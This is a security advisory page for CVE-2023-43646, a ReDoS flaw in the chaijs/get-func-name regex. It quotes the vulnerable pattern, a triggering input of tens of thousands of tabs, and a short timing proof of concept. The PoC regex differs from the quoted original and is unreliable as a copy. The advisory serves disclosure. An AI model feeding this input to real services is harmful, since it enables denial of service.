Ecosyste.ms: Advisories

Security Advisories: GSA_kwCzR0hTQS00cTZwLXI2djItanZjNc4AA2HC

Chaijs/get-func-name vulnerable to ReDoS

The current regex implementation for parsing values in the module is susceptible to excessive backtracking, leading to potential DoS attacks. The regex implementation in question is as follows:

const functionNameMatch = /\s*function(?:\s|\s*\/\*[^(?:*/)]+\*\/\s*)*([^\s(/]+)/;

This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input:

'\t'.repeat(54773) + '\t/function/i'

Here is a simple PoC code to demonstrate the issue:

const protocolre = /\sfunction(?:\s|\s/*[^(?:*\/)]+*/\s*)*([^\(\/]+)/;

const startTime = Date.now();
const maliciousInput = '\t'.repeat(54773) + '\t/function/i'

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");

Permalink: https://github.com/advisories/GHSA-4q6p-r6v2-jvc5
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cTZwLXI2djItanZjNc4AA2HC
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 1 year ago
Updated: about 1 year ago

CVSS Score: 7.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

EPSS Percentage: 0.00081
EPSS Percentile: 0.35721

Identifiers: GHSA-4q6p-r6v2-jvc5, CVE-2023-43646
References:

• https://github.com/chaijs/get-func-name/security/advisories/GHSA-4q6p-r6v2-jvc5
• https://nvd.nist.gov/vuln/detail/CVE-2023-43646
• https://github.com/chaijs/get-func-name/commit/f934b228b5e2cb94d6c8576d3aac05493f667c69
• https://github.com/chaijs/get-func-name/blob/78ad756441a83f3dc203e50f76c113ae3ac017dc/index.js#L15
• https://github.com/advisories/GHSA-4q6p-r6v2-jvc5

Repository: https://github.com/chaijs/get-func-name
Blast Radius: 41.3

Affected Packages